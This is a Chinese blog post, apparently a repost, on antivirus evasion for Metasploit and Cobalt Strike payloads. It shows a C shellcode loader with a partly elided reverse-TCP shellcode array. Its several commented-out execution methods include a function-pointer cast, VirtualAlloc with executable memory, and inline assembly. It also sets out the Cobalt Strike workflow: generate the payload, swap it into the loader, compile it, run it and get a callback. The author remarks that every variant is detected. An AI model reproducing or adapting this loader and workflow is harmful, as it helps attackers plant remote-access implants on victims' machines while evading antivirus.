热门标签
热门文章
- 1mysql:Incorrect datetime value: ‘‘
- 2Matplotlib通过add_subplot()函数方法添加和选中子图_matplotlib subplot超过十个
- 3MQTT传输JSON数据实例_mqtt json
- 4Git解决Permission denied, please try again问题_git permission denied, please try again.
- 5贯彻落实《纲要》精神 保证幼儿生命安全----幼儿园安全工作汇报
- 6[转]Mac替代Xshell的良心国产软件 FinalShell_mac的xshell替代软件
- 7【附源码】计算机毕业设计SSM网络调查问卷系统_现有一个高校问卷调查,画出软件结构图
- 8Flutter运行项目一直:running gradle task_running gradle task 'assemblerelease'...
- 9【无标题】(网络原理(中)TCP机制)
- 10SQL中的UNION和UNION ALL_sql union 和union all
当前位置: article > 正文
C/C++免杀--原生态(GG)
作者:Monodyee | 2024-05-21 13:37:14
赞
踩
C/C++免杀--原生态(GG)
看个热闹吧...
metasploit payload运行原理浅析(sockedi调用约定是什么)
lib/msf/core/payload/windows/reverse_tcp.rb:
原生态:
MSF:
- #include <Windows.h>
- #include <stdio.h>
- #include <string.h>
-
- //#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口
-
-
- unsigned char buf[] =
- "\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b"
- .
- .
- .
- .
- \x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a"
- "\x00\x53\xff\xd5";
- int main()
- {
-
- //四种模式,随机选一种.(都GG)
- ((void(WINAPI*)(void))&buf)();
-
- //char* Memory;
- //Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- //memcpy(Memory, buf, sizeof(buf));
- //((void(*)())Memory)();
- //__asm {
- //lea eax,buf
- //call eax
- //}
-
- //__asm{
- //mov eax, offset shellcode
- //_emit 0xFF
- //_emit 0xE0
- //}
- }
CS:
cs--创建监听器--生成c的payload--替换payload--编译执行--上线
什么原理?
shellcode生成
msf cs
利用C/C++编译shellcode形成exe上线
shellcode:免杀手段繁多--搞坏的可能性小--自定义更多选择
可执行文件:免杀手段单一--搞坏的可能性大
MSF 源码地址reverse_tcp.rb
源码shellcode上线逻辑
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Monodyee/article/detail/602799
推荐阅读
相关标签
